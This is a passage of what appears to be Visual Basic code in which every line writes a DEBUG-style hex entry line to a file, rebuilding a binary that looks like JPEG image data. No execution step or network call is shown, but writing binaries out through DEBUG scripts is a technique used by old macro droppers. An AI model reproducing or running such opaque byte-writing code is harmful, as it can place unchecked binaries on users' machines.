16 B8 93 48" Print #1, "e 1D80 42 05 96 6A 52 3E A5 EE 1F FF 00 25 EE 7F EC BD" Print #1, "e 1D90 D3 3F E4 A1 EC 8F 02 9B 56 98 BE C6 E3 7E 00 85" Print #1, "e 1DA0 C3 9A 74 23 61 EC DB 30 BB 5D 0F F3 54 AA 3C 31" Print #1, "e 1DB0 B8 B5 11 74 5D CF 6D D6 1A 14 EE BB 6F 4D C6 EA" Print #1, "e 1DC0 60 6E B7 82 89 2D F2 56 A8 13 B0 E1 F3 E2 83 A9" Print #1, "e 1DD0 38 B0 AF 79 3E 4B 74 59 1A BB 94 C9 D4 F1 58 9E" Print #1, "e 1DE0 DA 8E FA EC A2 95 18 FA 61 AB 07 AD 91 AE 57 59" Print #1, "e 1DF0 07 7A 28 2E 23 86 21 98 2C 75 E9 7C 58 70 15 8E" Print #1, "e 1E00 8B 7B 13 AE A8 FE 1E BB 1E 47 C2 6C 57 AE A4 E6" Print #1, "e 1E10 8E 7C 36 08 D5 35 8F 33 85 69 2B 71 AA EC 0B DD" Print #1, "e 1E20 FE EA E2 36 66 61 2A D4 27 C4 AF 77 1E 6B 33 4A" Print #1, "e 1E30 CA 9A 34 94 EC 4E 35 9F C3 0D 82 B7 B5 BA 76 1A" Print #1, "e 1E40 70 E1 C6 53 2D 78 57 0D 84 50 59 9D 85 AA 01 20" Print #1, "e 1E50 F3 57 CC DE 6A 42 8B F8 05 9A 18 3A AC E4 BC A6" Print #1, "e 1E60 86 E8 B1 0F 30 83 1E 5C D9 E4 9C 2A 99 38 F2 EC" Print #1, "e 1E70 0D 60 B2 2D 75 B8 84 D1 C2 21 61 95 1B 2E 89 A7" Print #1, "e 1E80 43 17 59 5B 8F 6F EF B2 C5 19 DF D5 58 AB A6 B5" Print #1, "e 1E90 AD 71 64 E6 21 35 A0 65 02 00 45 CC 00 4E AB D5" Print #1, "e 1EA0 E1 3F 52 18 A9 BF 4D E1 70 3C D5 5C BA 66 96 B7" Print #1, "e 1EB0 4F E4 9E 5F 4E 9D 4A BA FA 98 B2 EC 9B 5F B3 A7" Print #1, "e 1EC0 4D B3 61 74 FC 43 3B 77 4E 2B 94 1C EF 47 AA E2" Print #1, "e 1ED0 7A 88 55 3F 08 70 61 18 9E 4E E0 F3 4D 35 18 40" Print #1, "e 1EE0 3A 1E 05 4B 08 26 3C D5 D4 54 A6 E9 9B 38 7F 65" Print #1, "e 1EF0 C6 3C 10 EC C1 0A 69 53 24 2C 35 1A 5A 7A EC D4" Print #1, "e 1F00 E2 44 E2 00 0E AB 2D D6 64 30 EB C9 62 7D 8F B7" Print #1, "e 1F10 78 3E F0 5B C5 61 76 CD 16 88 76 B6 56 7B 56 02" Print #1, "e 1F20 E6 9F 35 99 86 A5 3E 6B 23 5A D5 65 AA E8 A5 60" Print #1, "e 1F30 0D A6 C9 E8 99 44 19 8B 93 B2 C9 CE 22 40 12 9A" Print #1, "e 1F40 FE 3E 32 A6 57 92 CA D5 A4 14 43 49 00 EA B3 16" Print #1, "e 1F50 1F 14 E2 EA 43 EE A0 52 BA B9 B7 25 25 6B 75 8C" Print #1, "e 1F60 D1 AA CF 47 69 83 0F 98 FE A8 BF D1 FD 26 AD 37" Print #1, "e 1F70 9D 5A F7 18 53 40 B2 A7 47 08 2A 4B 5B D8 BB 97" Print #1, "e 1F80 02 9A 25 E1 87 7B 0C 2C 19 8B 99 A0 81 F7 D1 36" Print #1, "e 1F90 A3 58 E6 87 37 0E 3C 5A A0 E6 3A 1E 38 84 E7 B9" Print #1, "e 1FA0 ED 27 90 30 9B 83 86 8D 99 58 6B 51 0C C5 F0 1D" Print #1, "e 1FB0 0A 6E 3F 46 A6 7D 1F E3 A6 D3 36 4F 77 FA 75 4D" Print #1, "e 1FC0 D6 97 1A 6E 1C 3A 6C BE CC 6E 68 68 EA 85 C5 D6" Print #1, "e 1FD0 17 09 5F A7 65 D4 06 8D 99 19 4F B5 3F 16 3C DE" Print #1, "e 1FE0 41 0E CE 86 1A 4D D0 07 05 EB 69 B9 BE 5E DA 5D" Print #1, "e 1FF0 B8 6C 50 2D A8 09 E5 B6 E4 04 61 E4 F9 AB AE 28" Print #1, "e 2000 36 AB 89 7B 8E A4 29 A0 F8 77 25 AA 82 ED 93 C9" Print #1, "e 2010 40 B6 DE C9 8E B9 D1 56 69 7B 4D AC 9D 8C B7 01" Print #1, "e 2020 B3 B3 84 4B 4D 95 F6 58 AC AE 59 94 96 98 45 C1" Print #1, "e 2030 91 E2 A4 AD 2C 8B 84 B5 FE 0B B5 04 53 A6 45 FB" Print #1, "e 2040 53 62 13 00 F4 2A 4D F4 87 6E E1 A6 08 70 E6 B1" Print #1, "e 2050 87 B9 EE AA 6C E7 73 F9 48 E0 8B D9 4F D5 16 E2" Print #1, "e 2060 AB 7F 29 41 B4 EA 0C C2 63 91 46 A8 32 0B 22 21" Print #1, "e 2070 61 EC C7 67 32 09 D5 37 13 99 DA 37 AA 06 AF A4" Print #1, "e 2080 86 BB F4 85 06 B5 6F 22 3F B2 6B 8B 1E F2 34 97" Print #1, "e 2090 29 04 B4 72 05 16 7A 3D 36 34 B8 10 4C 28 3B 33" Print #1, "e 20A0 14 5B DA 38 B7 85 D6 F9 5E F1 10 FC 38 07 12 AD" Print #1, "e 20B0 B7 B5 3C 6C 11 2D 6B 47 80 53 2B A2 C2 EA 4D 7B" Print #1, "e 20C0 7F 50 5E B2 93 47 F1 15 2C 35 1B E6 AD 59 C3 C4" Print #1, "e 20D0 29 A5 51 AF FD 94 56 69 69 EE 6A B5 56 DA 08 E0" Print #1, "e 20E0 BA F1 1B 30 83 65 EE F1 78 AB 30 0F 35 39 7C DC" Print #1, "e 20F0 A0 D4 A4 7F 89 35 E4 81 E0 56 6D E5 6D 90 0F 96" Print #1, "e 2100 CB 6C 66 5B B9 B8 88 3A 8F 34 D7 3B 0C F3 5E 90" Print #1, "e 2110 FA 8F 73 2F 20 86 92 3F FB CD 06 36 A1 77 88 8E" Print #1, "e 2120 E5 D4 91 2B 49 2A 26 CB 80 FD CA C1 4F 2F 8A 07" Print #1, "e 2130 D3 0B 98 D7 68 E6 5F 0F D4 AA E5 04 37 79 A7 5F" Print #1, "e 2140 15 4F B5 AC 58 EA 4D C7 44 44 CA ED 31 3A 9D 3A" Print #1, "e 2150 90 F8 69 D1 C9 D5 31 39 CF 7E F1 27 54 3B 38 0D" Print #1, "e 2160 E5 0B 15 37 C7 45 15 C5 BE 66 A1 D9 13 8F E6 0A" Print #1, "e 2170 49 BA 12 EF BF 70 1E 3B 38 95 99 8B 76 3C 17 14" Print #1, "e 2180 05 3B 0D B1 C1 00 10 01 5F 67 37 21 DA CB 9D FB" Print #1, "e 2190 05 2E 40 D4 FB 28 6A 2D AB 76 F5 56 BD 33 BA 7D" Print #1, "e 21A0 8C 8D 93 C5 61 52 D3 FB A1 0D B2 F5 95 5A 3A 04" Print #1, "e 21B0 CB CB 16 BB 5B 52 32 BB 8A B6 DA B8 1C E1 86 E0" Print #1, "e 21C0 1E 5C 42 6B 1D 99 9A 46 22 17 69 BA E6 EE 9A 6E" Print #1, "e 21D0 D4 2C 55 70 D3 AF 3B F0 7F 70 8B 71 62 EB DD 81" Print #1, "e 21E0 B3 10 9C 13 C5 53 68 2C 75 57 0B E1 E0 B2 10 D7" Print #1, "e 21F0 E1 C6 CC 57 0F 09 8E F4 78 75 3A 63 CF 09 E0 9B" Print #1, "e 2200 3F 0C E1 E8 11 8D 50 65 4B 29 45 61 1C 76 40 12" Print #1, "e 2210 BD 7D 48 FD 2D 12 55 99 58 FF 00 18 FE CA 29 02" Print #1, "e 2220 7A 77 70 38 CB 39 2D D5 B9 DC 72 69 75 6C 2E E4" Print #1, "e 2230 47 F9 4E 75 2A A2 67 50 16 1A A2 95 4F A9 9F D4" Print #1, "e 2240 2E CD B8 E8 55 F9 5D 99 AA 2A D2 3D 1C DB 85 25" Print #1, "e 2250 62 77 92 BA 8A 43 C5 E7 45 2F 39 47 34 F6 8E 17" Print #1, "e 2260 1E 3E CB C5 5A C8 98 99 D9 BE 55 9C E4 26 D0 B3" Print #1, "e 2270 1D 80 22 D1 F0 66 0A 36 BE 9C D4 C4 27 05 47 71" Print #1, "e 2280 1C 8A 18 6A 49 E5 0A 95 1E D1 AD A6 38 B8 27 52" Print #1, "e 2290 AF 49 92 39 14 5E EA 56 D2 31 21 89 BA AB 03 F7" Print #1, "e 22A0 D9 98 A8 1C 56 3A AF 6F 80 37 4C A2 08 68 63 71" Print #1, "e 22B0 CC 6A 54 FD 95 3A 8C 7B DE 00 D3 8C 71 0B 0D 38" Print #1, "e 22C0 81 F1 71 2A CA EB 10 DE 58 1D E4 A5 62 F4 97 76" Print #1, "e 22D0 6D E0 D8 CC 7C 96 4A 53 F5 BB FB 2C 22 1A 39 34" Print #1, "e 22E0 47 B7 D7 28 0A 36 31 C3 56 A1 4A AB 3D 53 AD 8B" Print #1, "e 22F0 88 3C D7 64 E2 39 87 73 0B A2 05 FF 00 C2 D4 7E" Print #1, "e 2300 37 0E 7B AD 52 4E 2F E4 14 63 F6 16 16 D9 3E C8" Print #1, "e 2310 F5 EE 1C D6 4F AA 5E DC 4C E1 F3 04 2A 53 A9 4D" Print #1, "e 2320 E4 8D 34 45 8F 10 E1 C1 03 F7 50 78 2E 2B 9E C6" Print #1, "e 2330 36 77 90 A4 5D 39 A2 50 A1 4F 75 EF BB 88 D0 4A" Print #1, "e 2340 70 91 4F B2 39 5A 45 CA 75 2A 22 5B 52 F1 C5 A5" Print #1, "e 2350 45 4C 25 4B 0A F9 C7 22 B2 6B F2 94 61 0F C3 43" Print #1, "e 2360 AA 9D EA 87 87 82 2E 71 97 1E 3D FB EA AF A7 3E" Print #1, "e 2370 FF 00 69 5F 2B 3F 9A 0D A4 DC 14 FF 00 9E C9 D8" Print #1, "e 2380 FF 00 14 13 8D 42 4F 45 73 6F 95 A8 81 96 9F 12" Print #1, "e 2390 14 0B 34 7B 16 3A C1 ED E0 74 28 B2 AB 04 F3 E5" Print #1, "e 23A0 E1 F9 02 D7 D9 C1 12 6F E6 B0 B9 A5 EC 67 1F 94" Print #1, "e 23B0 20 FA 78 27 81 6F 14 29 D4 27 2A B8 B7 3D 9A 40" Print #1, "e 23C0 41 B4 59 7E 81 17 55 17 88 0A 9B F2 C3 B9 2F C3" Print #1, "e 23D0 D9 A2 A1 D7 0C 94 EA 95 A0 3C 69 51 A2 CF 56 50" Print #1, "e 23E0 46 07 F4 59 65 41 71 6B FA E8 A2 BD 21 3F 30 59" Print #1, "e 23F0 48 A8 3F 56 F0 51 EC 6E BE 52 AF A7 3E E0 58 DD" Print #1, "e 2400 75 89 D6 DB 2D 30 76 02 89 2B DD 17 F4 95 06 1A" Print #1, "e 2410 39 0D 87 97 E5 1C FA BB A3 4D B2 AD 75 4D F4 74" Print #1, "e 2420 03 09 F1 D9 34 ED 65 0C 79 CB A3 56 13 4C 63 F9" Print #1, "e 2430 93 4D 36 BB AF 25 85 C1 00 62 75 BF 25 3E 8E 3B" Print #1, "e 2440 47 45 E5 AB 15 1A A0 D4 71 B3 6A 70 41 9E 92 E1" Print #1, "e 2450 5D A7 52 46 EA ED 9A CE CF E9 76 85 61 A8 F9 6B" Print #1, "e 2460 38 F3 51 80 B8 A9 73 6A 37 F7 51 DB 82 39 3D AB" Print #1, "e 2470 2B A0 F4 D1 44 0A 8D E4 A6 1C C3 F2 BB B9 75 3D" Print #1, "e 2480 C1 03 6D D6 5B 1D 98 8D 9A B1 0B 42 C1 62 A4 F7" Print #1, "e 2490 A5 F4 87 99 50 32 B7 93 6D B7 A7 B5 8E E4 ED 89" Print #1, "e 24A0 DB 1B 05 32 22 9E C8 A7 C9 03 E8 AD A8 41 17 80" Print #1, "e 24B0 8F E0 DB 56 A5 70 33 87 08 FD 97 AF 18 5C CC B9" Print #1, "e 24C0 08 05 CB 1B 34 99 82 9C EE CC 07 BC 01 13 A4 20" Print #1, "e 24D0 71 63 04 7C 15 3F CA C4 D7 B0 B2 16 FB 4D 5E 4B" Print #1, "e 24E0 3B E0 72 50 ED 0A C4 D9 3E 05 5D AE 59 D9 75 34" Print #1, "e 24F0 AB 3D BF BA 8A 8F 6B FC A0 A2 59 59 F8 7E 53 7E" Print #1, "e 2500 ED FB 86 F1 DD 18 DA 31 78 28 60 5D 36 13 DD 6A" Print #1, "e 2510 92 F6 FD D6 59 3B 20 2C 23 F2 76 EF 67 79 74 22" Print #1, "e 2520 EA 2C C4 D1 69 52 CA 32 74 BA 2D 68 78 1A 94 D6" Print #1, "e 2530 03 86 04 1C 16 95 57 D2 7D 28 7C 26 1A 6F 29 A5" Print #1, "e 2540 ED 0E 03 80 B2 39 4C 7C 39 B4 44 B1 AF CC 20 CB" Print #1, "e 2550 D0 A5 47 46 DF 44 5E 66 BF A4 9D D1 D5 76 95 E9" Print #1, "e 2560 88 E3 2B 13 5B 0B D5 BA CB 30 BE C9 69 59 9A 25" Print #1, "e 2570 40 67 70 53 A4 25 C5 4B D8 1A 3C 54 1E ED FB B6" Print #1, "e 2580 D9 7D D5 0D 32 35 1D D9 6D 56 85 84 5D 5C A8 1D" Print #1, "e 2590 DD E5 68 3E 05 5F D9 FF 00 B9 AA FA 67 A0 59 AB" Print #1, "e 25A0 63 FA 8C 22 D6 BA 07 E8 29 DF 87 04 53 EB DE 7F" Print #1, "e 25B0 FE CF E8 16 12 D5 84 58 A0 F0 B2 39 D8 74 23 12" Print #1, "e 25C0 96 51 A8 E6 F3 C2 AE DB A6 31 CD 76 19 CD 09 D4" Print #1, "e 25D0 E8 53 0C 6F 21 C5 53 71 91 00 EC 0E 0C 26 99 E8" Print #1, "e 25E0 A0 1B AB AD D7 11 F4 EC BE 8A 29 53 7B 8F 40 B3" Print #1, "e 25F0 34 85 75 14 98 E7 F8 05 47 B4 69 17 EE B5 AF 20" Print #1, "e 2600 81 A5 86 DB ED 90 21 9C D4 05 AD 95 B4 EF 02 D1" Print #1, "e 2610 2D 5B 8B 2C 2B A9 22 56 9D DB FE 51 DF 5F F4 0A" Print #1, "e 2620 59 11 D4 A7 55 AA E6 CF 00 D4 1B C5 36 BD 66 87" Print #1, "e 2630 3C DD 80 F0 EA B0 B8 92 54 B6 FC 93 D8 ED E7 18" Print #1, "e 2640 58 CF 04 D7 8D 10 73 CC 35 A6 7C 56 8E 8D 25 07" Print #1, "e 2650 80 A9 BC 8C EE 13 3C 91 6E 67 46 A5 76 8C 58 AA" Print #1, "e 2660 96 E3 16 6C A8 71 2E 53 CD 53 66 8D 17 71 1C 94" Print #1, "e 2670 00 19 4C 68 D6 A1 87 7D A6 7D 84 3C 07 05 EB 31" Print #1, "e 2680 8F DD 48 05 E7 AA F5 7B 2E 7B E0 E2 8F 05 9A 07" Print #1, "e 2690 D4 56 4B FD 22 57 B9 79 F2 47 D5 B9 68 76 6B B3" Print #1, "e 26A0 AF 82 D4 FD 96 A5 6F 2B CA B3 AF DE CB 46 A1 F2" Print #1, "e 26B0 57 A4 FF 00 B2 B8 21 69 DF 7F D7 FD 02 C3 86 55" Print #1, "e 26C0 98 10 74 87 02 99 87 E4 B2 0D AD B8 4D D7 FB 5F" Print #1, "e 26D0 77 A5 93 47 54 E5 4C CF 3D 80 FC 52 9A 87 CA 1A" Print #1, "e 26E0 AE D6 7D 8A 2D 0F 81 1C 93 DD 50 7A B9 81 D5 5E" Print #1, "e 26F0 9B 27 AD D1 7B 59 80 13 CB 55 53 9C 26 84 23 91" Print #1, "e 2700 9E FC D0 AB 07 93 94 54 69 1E D0 33 11 03 A2 64" Print #1, "e 2710 36 E7 69 35 0E 14 54 ED DE 85 93 13 FE 96 CA 82" Print #1, "e 2720 C2 3C 6C BD F0 FB 2B 56 FF 00 AF F9 53 4D ED 7F" Print #1, "e 2730 8D 96 EB 9A EE 0B 76 3C 56 7A 83 C8 2C D7 F1 59" Print #1, "e 2740 58 02 E1 F6 5A 85 70 0A 33 4D BF 65 BA 02 E2 15" Print #1, "e 2750 AA 15 6A 93 E4 AC 41 42 71 2E CE 9D 86 AA E9 95" Print #1, "e 2760 1E DB 9E AA F4 A5 61 D2 91 DD E9 D1 49 C5 E4 80" Print #1, "e 2770 10 D0 37 5A 98 EA A0 B7 37 10 A2 72 94 C0 C1 68" Print #1, "e 2780 D9 09 A9 AD 79 D7 45 89 EE 74 72 08 E2 0C C5 CA" Print #1, "e 2790 16 09 8B A2 EA 8F 38 4F 25 86 8E EB 32 AC 7D 60" Print #1, "e 27A0 A9 C5 64 4D 31 35 5F 69 3A F7 EC 56 1A AD C4 DE" Print #1, "e 27B0 45 7A A7 76 67 91 D1 48 18 DB CD B7 F6 43 03 4F" Print #1, "e 27C0 8A 69 E5 B3 54 DB 98 D9 91 62 7B E9 53 F0 74 AF" Print #1, "e 27D0 5B E9 3F 60 A6 CF 3F AE EA 29 90 8E 1B 1E 6B 31" Print #1, "e 27E0 5A 29 25 5B EE B2 36 A3 FC 1A AF 4D FE 61 49 59" Print #1, "e 27F0 9C AD 2A E6 07 45 18 8A 8C 48 8D BA 6C 67 D2 14" Print #1, "e 2800 BD B3 1D 54 8A 6D 9E B7 DB 78 21 59 B8 7E 92 54" Print #1, "e 2810 B1 80 1E 68 62 17 E6 A1 B5 5D 0A 71 95 99 C4 EC" Print #1, "e 2820 B8 95 1C 15 B1 0F 35 05 A1 59 61 ED 1D 0A 1B 51" Print #1, "e 2830 C3 CD 66 71 2B 23 88 58 B1 BA 42 20 D4 31 DD F5" Print #1, "e 2840 80 B8 47 38 EE 65 71 5E BA 9B 1F D5 02 C1 00 F0" Print #1, "e 2850 9E F0 6F 34 0B B3 9E AA C2 3B 84 F2 52 B9 05 AA" Print #1, "e 2860 B9 2B 54 08 5A 0D B8 6A 54 2D 01 64 64 9E 65 6B" Print #1, "e 2870 DC BB 47 D9 71 1E 0A CF 29 A6 F2 AE CF DD 65 6C" Print #1, "e 2880 77 3F FF C4 00 28 10 01 00 02 02 02 01 04 01 04" Print #1, "e 2890 03 01 00 00 00 00 00 01 00 11 21 31 41 51 61 10" Print #1, "e 28A0 71 81 91 A1 20 B1 C1 D1 30 E1 F0 F1 FF DA 00 08" Print #1, "e 28B0 01 01 00 01 3F 21 67 52 88 5B 89 5E 35 C8 F6 45" Print #1, "e 28C0 18 87 53 27 70 00 C8 BC CA 45 AB C0 15 1A C1 87" Print #1, "e 28D0 4A 85 FF 00 68 F0 3E 1B 8E E8 43 40 0F 24 62 8B" Print #1, "e 28E0 10 A4 2D 25 73 49 25 B2 BA 1D 12 B9 59 5A 54 B8" Print #1, "e 28F0 09 F5 C9 86 32 59 8F A6 E5 1E 12 EF D0 C3 51 4B" Print #1, "e 2900 C4 BF 52 04 4A AB A8 CE 3E A8 DF A3 89 6B 8B D4" Print #1, "e 2910 8C 37 00 E0 CF 08 7A 15 CA D5 E2 72 54 2C 83 33" Print #1, "e 2920 03 C3 AC CD 1A CC D3 79 51 FA 16 30 79 CA 7E 80" Print #1, "e 2930 4B 30 58 D3 EE 05 46 09 6F 59 26 65 2F EA 31 08" Print #1, "e 2940 B0 E3 FB 45 89 81 CC 2D 26 5A BD 10 91 81 82 63" Print #1, "e 2950 C7 C4 63 EB A7 BE AD 99 30 B7 4E E5 1D 53 B1 2D" Print #1, "e 2960 AE E6 6C ED 53 39 E7 37 B9 45 51 F9 60 86 3E 64" Print #1, "e 2970 C3 DA 87 D4 AD 35 CB 20 FA 64 C4 B8 AF 42 F4 F4" Print #1, "e 2980 15 4A DD 7E 71 E9 46 5E D4 F6 E7 B7 14 EA 79 BD" Print #1, "e 2990 02 E3 C9 1E C9 56 FE 9B C9 01 E6 03 82 78 08 07" Print #1, "e 29A0 08 C8 73 42 10 77 96 64 35 60 DC 40 22 8D 34 51" Print #1, "e 29B0 B6 20 9A A7 19 31 7A 89 88 2E 50 FE 26 3B 8A 78" Print #1, "e 29C0 4A 16 E5 02 41 E0 87 2E CE 7A 7B C6 11 8F 7B 2F" Print #1, "e 29D0 FA 95 03 C3 11 96 03 0A 30 7C 2A 79 96 90 37 80" Print #1, "e 29E0 99 43 A5 53 95 97 2F 43 70 D4 A8 EF B9 5E 6D 0C" Print #1, "e 29F0 CB E5 66 78 30 4A 44 01 94 D1 93 1F DF 28 28 34" Print #1, "e 2A00 30 0F 68 26 8B 32 5D BC 32 91 C9 72 63 5F 99 49" Print #1, "e 2A10 00 E1 95 81 D2 DA D7 C1 CC 60 AE 82 E2 38 7C 78" Print #1, "e 2A20 DB 7B 86 C6 08 D5 78 63 87 A7 F8 25 9C C6 EB 49" Print #1, "e 2A30 42 55 E5 02 B8 16 4E FD 0C D3 0F F1 00 2E A0 FA" Print #1, "e 2A40 FA 25 1F D1 15 B0 9F A9 61 FE 52 B9 9C 08 35 79" Print #1, "e 2A50 43 60 E5 C7 71 C6 6B B8 81 6A 4C C3 11 83 7B D4" Print #1, "e 2A60 21 76 3A 5C 2A 45 5E A2 E4 A6 E0 53 28 A8 17 C2" Print #1, "e 2A70 06 A5 56 4F 99 69 B3 ED 71 D7 89 67 32 DA 8D B6" Print #1, "e 2A80 3F 28 C1 B2 BC 80 96 33 13 E8 62 CF D0 98 36 F0" Print #1, "e 2A90 4E 25 F4 4C 9E 13 68 5D 49 B6 EF 01 2D 60 C1 07" Print #1, "e 2AA0 C2 D1 CC 78 EC 83 DC F9 75 ED 15 4F 32 17 3A 12" Print #1, "e 2AB0 BF 9A 46 35 6A BE AF E2 56 78 07 FC 19 6F 79 72" Print #1, "e 2AC0 AE 63 8E B3 3C 8D 75 12 DA 1A 87 73 F8 99 2E 2B" Print #1, "e 2AD0 F4 8A 94 CA 7A 67 89 83 E9 4E B0 76 CA 19 58 0B" Print #1, "e 2AE0 20 5C 07 B4 CE 5D BE 26 9F D2 25 B1 7C E6 23 CB" Print #1, "e 2AF0 C4 14 75 A8 FA 75 7A 5E F9 78 37 99 6E FD 0F 1C" Print #1, "e 2B00 F0 CF 32 57 CA 78 A5 BA 8C D0 FB 78 8D D9 F2 F3" Print #1, "e 2B10 2C 71 7E 6F D0 17 E1 95 8D B8 4A AC D4 7B 41 78" Print #1, "e 2B20 36 0D DF 68 DC C2 F2 B0 C1 7F D7 30 05 46 00 BB" Print #1, "e 2B30 B8 25 19 D2 2A 57 D8 E5 84 BC CB 06 8C A9 C1 95" Print #1, "e 2B40 B6 55 E6 37 01 57 18 98 A3 55 CC DB 0E 65 26 9B" Print #1, "e 2B50 71 5F 28 10 D3 93 A2 36 6A 8D 16 D7 75 39 48 F8" Print #1, "e 2B60 81 1D 46 34 4D 65 49 B0 F1 89 E5 99 56 A5 A3 8D" Print #1, "e 2B70 C6 27 5A 11 FD FE 22 10 55 F4 40 E3 18 F9 8B 12" Print #1, "e 2B80 B0 2D 2B 4F 98 DE FF 00 94 AB 19 6F 6F E8 AA 84" Print #1, "e 2B90 3A D0 D8 09 5F 11 0A D4 2D 12 B1 55 06 CC 5B E9" Print #1, "e 2BA0 83 6F EA 1F FA 20 B8 83 6A 10 6C 87 DC 31 A1 32" Print #1, "e 2BB0 CC 50 4B A2 0B 7E 86 FD 56 A8 30 FD 05 44 75 0E" Print #1, "e 2BC0 F4 17 1D FA 33 A1 99 4A 44 39 42 E6 3B AF C4 4A" Print #1, "e 2BD0 4D B5 A2 67 BD 70 CE 2F 03 E9 DC A9 BB A5 35 07" Print #1, "e 2BE0 A8 CC 1B BA 5D D1 1A B4 79 11 A7 2C 47 54 DD FA" Print #1, "e 2BF0 0A E5 D3 A8 EB F2 8B 28 67 F1 C5 B8 22 02 5A EC" Print #1, "e 2C00 E6 B8 9E 54 87 A9 94 45 B7 6C F7 62 C4 60 12 67" Print #1, "e 2C10 8F E2 58 CD F1 C3 F9 8F 30 0F 64 E4 15 D3 10 D3" Print #1, "e 2C20 CC BB 30 6F CC AF 03 F3 0C DE 0B 40 E1 6E A3 46" Print #1, "e 2C30 A1 ED 2B 18 34 7B 81 DC 44 17 83 86 A3 A3 66 0A" Print #1, "e 2C40 E2 71 EF 2B B0 F7 62 DC 22 A6 BE 98 D9 16 6A 75" Print #1, "e 2C50 B9 65 10 C0 6A A3 52 D5 C5 56 73 CC EC 11 19 B9" Print #1, "e 2C60 42 E2 07 25 40 5A 7A 96 88 AE 6E 22 1F D4 7F 74" Print #1, "e 2C70 C8 66 1E 83 09 B9 68 38 83 E9 0C B1 8A A6 1A BD" Print #1, "e 2C80 FD 00 B0 80 62 B8 88 C0 AA 05 4D 51 18 4C AC EA" Print #1, "e 2C90 02 8E 60 6B 32 AD D4 26 69 54 92 8B 1A 6D 6E 62" Print #1, "e 2CA0 CF 2A 1D CB 00 3A F4 16 3E 65 2F 8F A1 50 8D 58" Print #1, "e 2CB0 60 4B 2C AE 88 EA 59 E8 2F 9B 9B 94 FC 93 05 FB" Print #1, "e 2CC0 03 31 3F BD 42 66 80 B9 1B A3 F1 C7 9F 54 A1 D3" Print #1, "e 2CD0 37 B4 A9 49 D0 84 A5 AA 7C 73 2B AF 01 91 D4 A5" Print #1, "e 2CE0 8E E3 30 D2 26 82 A8 77 E1 26 3E E8 E1 51 F9 87" Print #1, "e 2CF0 44 A5 CB E6 38 A0 FD CC 9A 3A B4 78 1D 5A A7 BD" Print #1, "e 2D00 72 87 37 52 B1 D4 AC FE 50 C8 68 9C 8F 96 E5 5E" Print #1, "e 2D10 9F 68 99 6E 25 56 E3 02 46 CC BF B9 BC 9B F9 CD" Print #1, "e 2D20 7E 9C 7A 93 69 CC 25 C1 F4 61 16 30 52 C0 03 DB" Print #1, "e 2D30 B9 D6 38 1C AA 9A C5 42 A8 D5 66 33 51 5C 92 F8" Print #1, "e 2D40 7B 75 25 1B 01 F3 84 C2 10 79 FF 00 59 49 F9 22" Print #1, "e 2D50 AE 83 BB 20 6A BF 5C C4 CD 41 41 59 76 97 15 1E" Print #1, "e 2D60 D8 6F A3 2F D8 B7 A2 15 41 76 B3 AF 09 AC E2 8D" Print #1, "e 2D70 A9 7D C2 36 1E 50 56 5C CC 64 0B 06 A6 17 2B 97" Print #1, "e 2D80 31 20 DE 04 2B C9 26 01 E2 30 1D B1 15 BC A9 95" Print #1, "e 2D90 79 23 C6 5C 6C 81 D9 1F F3 B9 66 AD E5 DC 65 55" Print #1, "e 2DA0 81 B0 78 26 78 C6 8C 0F C4 51 EF 87 F2 19 9F 72" Print #1, "e 2DB0 91 F3 59 70 D0 E0 D5 75 96 3E 4A 19 F1 F9 D4 2D" Print #1, "e 2DC0 1A 14 B1 93 DB A9 8A E5 9C 24 B6 F6 63 F7 6A 24" Print #1, "e 2DD0 65 75 6C 33 C3 C2 D4 0A A8 BC C0 B9 7B 81 94 99" Print #1, "e 2DE0 80 79 62 01 54 15 14 E0 E2 16 89 76 41 02 D1 CF" Print #1, "e 2DF0 A5 11 FE 50 81 AD A7 86 64 29 65 5B C4 7A A4 B8" Print #1, "e 2E00 5E 56 03 D0 EB D2 F1 2F F4 2E 1E 8B E9 2D 08 A2" Print #1, "e 2E10 D4 B9 83 0D A1 92 2B 80 F0 42 38 5E 06 63 6E 26" Print #1, "e 2E20 75 E2 08 01 67 3D C1 67 91 F4 D6 0A FF 00 8A 21" Print #1, "e 2E30 7B 07 DA 50 43 56 FC 9E D0 73 EE 8C FD 10 CB FA" Print #1, "e 2E40 49 39 8B 6A 1A 8C 38 E1 E4 5D 4E 5A C4 6B DF D0" Print #1, "e 2E50 46 02 71 17 55 0D 97 A8 94 A4 D5 F5 1D 2C 7C C5" Print #1, "e 2E60 BE 71 3D EC C2 DF E6 11 95 56 F5 4A 5D A7 1D 3F" Print #1, "e 2E70 88 83 FE AA 3A 98 18 6F 77 E4 8F D5 53 13 6B 88" Print #1, "e 2E80 34 0A 18 0F 78 D0 D5 10 59 51 0D 8E F2 7F E2 27" Print #1, "e 2E90 CD E9 42 D0 39 22 78 96 CF E2 71 A8 C0 14 F2 5B" Print #1, "e 2EA0 B4 62 C3 69 B3 DE DE 4F 33 2E 00 CC 83 A3 57 3B" Print #1, "e 2EB0 84 72 3D FF 00 F9 96 F2 33 20 BE D8 44 9F B2 1B" Print #1, "e 2EC0 A3 E3 33 3D 02 A3 E8 65 5C 39 D3 49 9F DA 3B 50" Print #1, "e 2ED0 D9 57 F0 A9 99 37 3E EF DE 5C D9 B9 16 E0 6F 67" Print #1, "e 2EE0 4F 0B 24 4C BC CE B5 6C 89 8A 82 B1 0D 39 4A B1" Print #1, "e 2EF0 61 8E 84 4B 0B B5 53 71 3E D2 82 EF 31 7A 12 E0" Print #1, "e 2F00 C2 5C 20 CD 62 C2 12 F5 45 38 21 97 48 6E 8A 4C" Print #1, "e 2F10 47 82 A0 F0 40 70 6E 72 6F A5 D4 70 7E 54 6B 1F" Print #1, "e 2F20 D5 20 55 0E 41 C7 BC DD F0 D5 66 54 6A 7B 42 18" Print #1, "e 2F30 8A 4A E1 30 B0 B3 A8 39 47 23 F7 77 0D DB C4 76" Print #1, "e 2F40 FA 43 61 7E EA 6B 34 4B A8 38 6B 6C D1 9C 4A 43" Print #1, "e 2F50 E1 04 EF 50 DA E4 F1 2E 16 1E 2A 75 82 89 69 44" Print #1, "e 2F60 E9 55 28 42 5E 41 3F 2C 68 73 6A 50 7B 2E 08 E2" Print #1, "e 2F70 53 C2 2F FA 67 11 A1 2C 66 AE C0 7C DF F7 2C BB" Print #1, "e 2F80 1C A8 3F 69 58 12 F2 A0 C8 F5 2B 16 0A AE 13 E7" Print #1, "e 2F90 F8 97 D8 29 42 56 31 65 44 E4 16 D3 EC BA 20 D0" Print #1, "e 2FA0 CB 16 C9 72 44 BC 04 51 7F 05 CC 4B 99 01 32 7B" Print #1, "e 2FB0 19 DC 53 AF DB 2D F0 1D 7C 44 63 6C F0 87 76 FE" 